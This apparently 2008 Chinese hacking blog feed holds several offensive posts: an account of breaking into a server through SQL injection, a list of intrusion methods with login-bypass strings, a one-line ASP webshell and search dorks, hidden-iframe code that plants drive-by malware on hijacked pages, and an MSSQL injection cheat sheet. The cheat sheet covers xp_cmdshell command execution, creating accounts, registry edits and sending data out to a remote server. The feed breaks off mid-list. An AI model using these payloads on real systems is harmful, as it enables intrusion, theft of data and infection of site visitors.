<DIV align=left><FONT face=黑体 color=#ffffff size=2>在第一页中就显示找到了20几个（20%），从头开始试，检测一下，是不是sa权限，若不是可先跳过。因为本文讲的是sa权限，所以在这里我们只找有sa权限注入点的网站，以省去菜鸟们在注入时因一些权限问题而导致入侵卡住的情况。也许有人要问了，有那么多sa权限注入点的网站吗？根据我的个人经验，只要你的关键字设的好，每100项中就有20几个（约20%）有注入漏洞的网站，在这些网站中又有5个左右（约5%）是有sa权限的。试想想，只要我们的关键字设的好，google可以搜索到的结果何止是100项，一般的搜索结果都在1万项以上，这样算来，我们的目标就有成百上千呀（小菜高呼：哇！发财了！），就怕你没有那么多的精力去注入全部的网站，呵呵！我马上就找到了一个（运气好呀，可以去买票了，说不定是头奖呢？呵呵，又一个百万富翁！什么？现在百万富翁不算啥？要不，你给我一百万？！）。将这个网址复制到明小子的domain3.2中进行检测，也确实是sa权限，跟阿D注入工具显示的一样。 </FONT></DIV>
<DIV align=left><FONT face=黑体 color=#ffffff size=2>用domain的命令行功能查看一下开放的端口，发现开放了21、23、80、1433、3389等端口，看来我今天运气的确不错呀！加个账号admin$，但由于管理员已经远程登录3389。 </FONT></DIV>
<DIV align=left><FONT face=黑体 color=#ffffff size=2>看来我暂时不要登录的为好。再看看有没有其它可以利用的东西，用阿D注入工具的目录浏览功能看了一下（个人感觉这方面阿D注入工具要比domain好！明小子怒目圆睁，大叫：你收了阿D多少好处！）忽然眼睛一亮，发现D盘有一个wwwroot目录，并且里面有一个目录和网站名一样。 </FONT></DIV>
<DIV align=left><FONT face=黑体 color=#ffffff size=2>呵呵，好东西呀，向里面写入个asp木马试试，浏览文件也好方便一些。但接下来让我郁闷的是明明提示已经上传成功。 </FONT></DIV>
<DIV align=left><FONT face=黑体 color=#ffffff size=2>但在浏览器中输入它的地址却提示没有该文件，而且到了后来，domain的命令行功能反馈回来的信息也变得非常凌乱，不知道是怎么回事。于是想换个cmdshell，又想起它开了23端口，用telnet连接了一下，发现有ntlm认证。呵呵，老办法，在本地新建一个admin$账号，密码和目标主机上的一样，再用这个账号运行cmd.exe，telnet到目标主机——连接成功，用query user查看了一下终端情况，发现有一个会话处于断开状态，于是我便用3389连接了一下，却提示3389已经达到了最大连接数！我晕，看来有连接数限制，干脆把这个会话结束掉，反正它也断开了，浪费资源！呵呵，输入logoff 2（它的会话ID），然后用3389登录试试，登录成功。</FONT></DIV>]]></description>
<author>xuliang</author>
<pubDate>2008-2-4 19:46:00</pubDate>
</item>
<item>
<title><![CDATA[学黑客必读:入侵的14种可利用方法]]></title>
<link>http://xuliang.bokemx.com/200824194518.html</link>
<description><![CDATA[<DIV>
<DIV align=center><B><FONT face=黑体 color=#eeeeee size=2>学黑客必读:入侵的14种可利用方法 </FONT></B></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>---------------------------------------------------------------------------------</FONT></DIV><FONT face=黑体 color=#eeeeee size=2>1.上传漏洞[不多讲] </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>pS:如果看到:选择你要上传的文件[重新上传]或者出现“请登陆后使用”，80%就有漏洞了！ </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&nbsp;&nbsp; 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传. </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>2.注入漏洞[不多讲] </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令: </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>http://注入网址;updateadminsetpassword=’新MD5密码’wherepassword=’旧MD5密码’--&nbsp;&nbsp;&nbsp;&nbsp;[admin为表名.] </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>3.旁注,也就是跨站. </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等方法来入侵我们要入侵的站点。，在这里有个难点，就是一些服务器的绝对路径经过加密，这就看我们的本事了 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>4.暴库:把二级目录中间的/换成%5c </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>EY:http://www.ahttc.edu.cn/otherweb...s.asp?BigClassName=职责范围&amp;BigClassType=1 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>如果你能看到：’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’不是一个有效的路径。确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行. </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>5.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有： </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>’or’’=’"or"a"="a&nbsp;&nbsp;’)or(’a’=’a&nbsp;&nbsp;")or("a"="a&nbsp;&nbsp;or1=1--&nbsp;&nbsp;’or’a’=’a </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>6.社会工程学。这个我们都知道吧。就是猜解。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>　ＥＹ： </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&nbsp;&nbsp; admin&nbsp;&nbsp;waishi </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>７.写入ASP格式数据库。就是一句话木马[〈%executerequest("value")%〉]，常用在留言本. </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>ＥＹ：[这个就是ASP格式的数据库]，再写入一句话木马 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>8.源码利用：一些网站用的都是网上下载的源码.有的站长很菜.什么也不改. </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>这个站用的是：杰出校友录，源码我下过了， </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>默认数据库/webshell路径：\database\liangu_data.mdb后台管理：adm_login.asp密码及用户名都是admin </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&nbsp;&nbsp; </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL. </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>/Databackup/dvbbs7.MDB </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>/bbs/Databackup/dvbbs7.MDB </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>/bbs/Data/dvbbs7.MDB </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>/data/dvbbs7.mdb </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>/bbs/diy.asp </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>/diy.asp </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>/bbs/cmd.asp </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>/bbs/cmd.exe </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>/bbs/s-u.exe </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>/bbs/servu.exe </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>工具：网站猎手挖掘鸡 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>EY： </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>10.查看目录法:人一些网站可以断开目录，可以方问目录。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>EY： </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>这样我们可以找到数据库，下载不用我教吧 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>11.工具溢出:.asp?NewsID=&nbsp;&nbsp;/2j.asp?id=18&nbsp;&nbsp;.asp?id=[这种方法可以取得大量的WEBSHELL] </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>12.搜索引擎利用: </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>(1).inurl:flasher_list.asp&nbsp;&nbsp;默认数据库:database/flash.mdb&nbsp;&nbsp;后台/manager/ </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>(2).找网站的管理后台地址: </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>site:xxxx.comintext:管理 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>site:xxxx.comintitle:管理&nbsp;&nbsp;〈关键字很多，自已找〉 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>site:xxxx.cominurl:login </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>(3).查找access的数据库,mssql、mysql的连接文件 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>allinurl:bbsdata </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>filetype:mdbinurl:database </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>filetype:incconn </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>inurl:datafiletype:mdb </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>我主不做了。。自已做做吧。。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>13.COOKIE诈骗：把自己的ID修改成管理员的，MD5密码也修改成他的，用桂林老兵工具可以修改COOKIE。这个我就不多讲了 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>14.利用常见的漏洞：如动网BBS </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>EY： </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>可以先用:dvbbs权限提升工具，使自已成为前台管理员。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>THEN，运用:动网固顶贴工具，找个固顶贴，再取得COOKIES，这个要你自已做。我们可以用WSockExpert取得Cookies/NC包 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>这个我就不做了，网上教程多的是，自已下个看看。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>工具：dvbbs权限提升工具&nbsp;&nbsp;动网固顶贴工具 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>15.还有一些老漏洞。如IIS3，4的查看源码，5的DELETE </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>CGI，PHP的一些老洞，我就不说了啊。。太老了。没有什么大用途。</FONT></DIV>]]></description>
<author>xuliang</author>
<pubDate>2008-2-4 19:45:00</pubDate>
</item>
<item>
<title><![CDATA[进入后台怎么拿WEBSHELL]]></title>
<link>http://xuliang.bokemx.com/200824194155.html</link>
<description><![CDATA[<FONT face=黑体 color=#eeeeee size=2>去备份数据库,数据库的名称一定要是什么什么.asp后缀.之后得到一个备份好的绝对网址,假如网站网址是</FONT><A onclick="showLinkBubble(this);return false" href="http://www.xxx.com/main/manage/login.asp" target=_blank link="http://www.xxx.com/main/manage/login.asp"><FONT face=黑体 color=#eeeeee size=2>www.xxx.com/main/manage/login.asp</FONT></A><WBR><FONT face=黑体 color=#eeeeee size=2> <BR>备份后的数据库是D:\aaa\bbb\ccc\main\什么什么.asp <BR>那么就可以用</FONT><A onclick="http://www.bokemx.com/metalred821227/showLinkBubble(this);return false" href="http://www.xxx.com/main/" target=_blank link="http://www.xxx.com/main/"><FONT face=黑体 color=#eeeeee size=2>www.xxx.com/main/</FONT></A><WBR><FONT face=黑体 color=#3300ff size=2><FONT color=#eeeeee>什么什么.asp访问它的数据库,找到首页,修改下代码, <BR><BR>你可以用如下代码进行挂马. <BR><BR>&lt;html&gt; <BR>&lt;iframe src="http://www.bokemx.com/metalred821227/网马地址" width="0" height="0" frameborder="0"&gt;&lt;/iframe&gt; <BR>&lt;/html&gt; <BR><BR>或者 <BR><BR>&lt;SCRIPT language=javascript&gt; <BR>window.open("网马地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1"); <BR>&lt;/script&gt; <BR><BR>或者 <BR><BR>写一个JS文件 <BR><BR>JS文件： <BR><BR>document.write("&lt;iframe width='0' height='0' src='http://www.bokemx.com/metalred821227/网马地址&gt;&lt;/iframe&gt;"); <BR></FONT><BR>再在首页调用JS文件： <BR>&lt;script language="javascript" src="http://www.bokemx.com/metalred821227/</FONT><A onclick="showLinkBubble(this);return false" href="http://xxxxxxx.net/" target=_blank link="http://xxxxxxx.net/"><FONT face=黑体 color=#3300ff size=2>http://xxxxxxx.net/</FONT></A><WBR><FONT face=黑体 color=#3300ff size=2>文件名.js"&gt;&lt;/script&gt;</FONT>]]></description>
<author>xuliang</author>
<pubDate>2008-2-4 19:41:00</pubDate>
</item>
<item>
<title><![CDATA[注入命令]]></title>
<link>http://xuliang.bokemx.com/200823223837.html</link>
<description><![CDATA[<DIV><FONT face=黑体 color=#eeeeee size=2>我记性不好，所以把常用的注入代码记录下来，有点乱，但对我来说，还算很有用，希望大家也会喜欢！ </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>//看看是什么权限的 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>and 1=(Select IS_MEMBER('db_owner')) </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>//检测是否有读取某数据库的权限 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>and 1= (Select HAS_DBACCESS('master')) </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>数字类型 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>and char(124)%2Buser%2Bchar(124)=0 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>字符类型 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>' and char(124)%2Buser%2Bchar(124)=0 and ''=' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>搜索类型 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>' and char(124)%2Buser%2Bchar(124)=0 and '%'=' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>爆用户名 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>and user&gt;0 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>' and user&gt;0 and ''=' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>检测是否为SA权限 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>检测是不是MSSQL数据库 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>and exists (select * from sysobjects);-- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>检测是否支持多行 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>;declare @d int;-- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>恢复 xp_cmdshell </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>//----------------------- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;执行命令 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>//----------------------- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>首先开启沙盘模式： </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>然后利用jet.oledb执行系统命令 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")') </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>执行命令 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';-- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>判断xp_cmdshell扩展存储过程是否存在： </FONT></DIV>
<DIV><A href="http://192.168.1.5/display.asp?keyno=188" target=_blank><FONT face=黑体 color=#eeeeee size=2>http://192.168.1.5/display.asp?keyno=188</FONT></A><WBR><FONT face=黑体 color=#eeeeee size=2> and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>写注册表 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>REG_SZ </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>读注册表 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>读取目录内容 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>exec master..xp_dirtree 'c:\winnt\system32\',1,1 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>数据库备份 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>backup database pubs to disk = 'c:\123.bak' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>//爆出长度 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>更改sa口令方法：用sql综合利用工具连接后，执行命令： </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>exec sp_password NULL,'新密码','sa' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>添加和删除一个SA权限的用户test： </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>exec master.dbo.sp_addlogin test,ptlove </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>exec master.dbo.sp_addsrvrolemember test,sysadmin </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>删除扩展存储过过程xp_cmdshell的语句: </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>exec sp_dropextendedproc 'xp_cmdshell' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>添加扩展存储过过程 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>GRANT exec On xp_proxiedadata TO public </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>停掉或激活某个服务。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>exec master..xp_servicecontrol 'stop','schedule' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>exec master..xp_servicecontrol 'start','schedule' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>dbo.xp_subdirs </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>只列某个目录下的子目录。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>dbo.xp_makecab </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>将目标多个档案压缩到某个目标档案之内。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>dbo.xp_makecab </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>'c:\test.cab','mszip',1, </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>'C:\Inetpub\wwwroot\SQLInject\login.asp', </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>'C:\Inetpub\wwwroot\SQLInject\securelogin.asp' </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>xp_terminate_process </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>停掉某个执行中的程序，但赋予的参数是 Process ID。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>xp_terminate_process 2484 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>xp_unpackcab </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>解开压缩档。 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>xp_unpackcab 'c:\test.cab','c:\temp',1 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>create database lcx; </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>Create TABLE ku(name nvarchar(256) null); </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>Create TABLE biao(id int NULL,name nvarchar(256) null); </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>//得到数据库名 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>//在Master中创建表，看看权限怎样 </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);-- </FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>&shy;</FONT></DIV>
<DIV><FONT face=黑体 color=#eeeeee size=2>用 sp_makewebtask直接在web目录里写入一句话马： </FONT></DIV>
